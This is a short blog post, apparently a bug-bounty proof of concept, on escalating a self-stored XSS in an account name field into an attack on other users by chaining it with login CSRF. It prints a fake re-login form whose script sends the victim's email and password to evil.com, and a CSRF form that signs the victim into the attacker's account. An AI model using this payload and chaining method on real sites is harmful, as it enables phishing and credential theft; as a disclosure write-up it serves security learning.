Self XSS To Evil XSS

Saad Ahmed
Jun 20, 2019 · 3 min read

Hi guy I hope you all are fine this POC is all about how I convert the Self XSS To Evil XSS so let assume the site PRIVATE.COM

The first step simply sign-up and login to the account & start playing with the change account details functionality after some time I find out that the first name field is vulnerable to xss but the problem is this is self stored xss so I need to convert this xss to exploit other users I check the 1st method through CSRF but there is a CSRF token in the account update functionality so this method fail & then I remember GEEK BOY POC.

So simple created the html + js code to steal email & pass of victim.

<!DOCTYPE html>
<html>
<head>
<title>XSS</title>
</head>
<body>

<center><div class="panel-body">
<h3>Something Went Wrong Please Login Again</h3>

<div class="login-group">
<label for="email" class="control-label">Email</label>
<input id="Vemail" class="input span12" name="email" required="" type="email" value="" autofocus="">
</div>

<div class="login-group">
<label for="password" class="control-label">Password</label>
<input id="Vpass" class="input span12" name="password" required="" type="password" value="">
<div class="alert alert-error error hide" id="error_missingPassword">Please enter your password</div>
</div>

<button class="action-button btn btn-primary login-button" buttontype="login" type="submit" onclick="myFunction()">Login</button>

</div>


<script>
function myFunction() {
var x = document.getElementById("Vemail").value;
var y = document.getElementById("Vpass").value;
var pwd = x + ":" + y;
alert(pwd);
window.location = "https://evil.com/" + pwd;
}
</script>



</body>
</html>

This is a simple html code with 2 input fields with 1 button asking for Email and Password & the JS code simply get the input field value & send it to attacker server and upload the code the web host.

Image for post
Image for post

Simply use I frame to load the code from web host.

Image for post
Image for post

This is how i look like.

Image for post
Image for post

Everything is good now all I need is to send the user this form.

<html>
<body>
<form action="https://attacker.com/login/submit" method="POST">
<input type="hidden" name="email" value="email@gmail.com" />
<input type="hidden" name="password" value="password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

This is simply make victim to login in my account without knowing him & when he login in my account he see the msg Something Went Wrong with input fields & try to login when he try the JS code simply get the email & pass victim enter and send it to attacker server

Image for post
Image for post

I hope you like it :)

./Logout

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store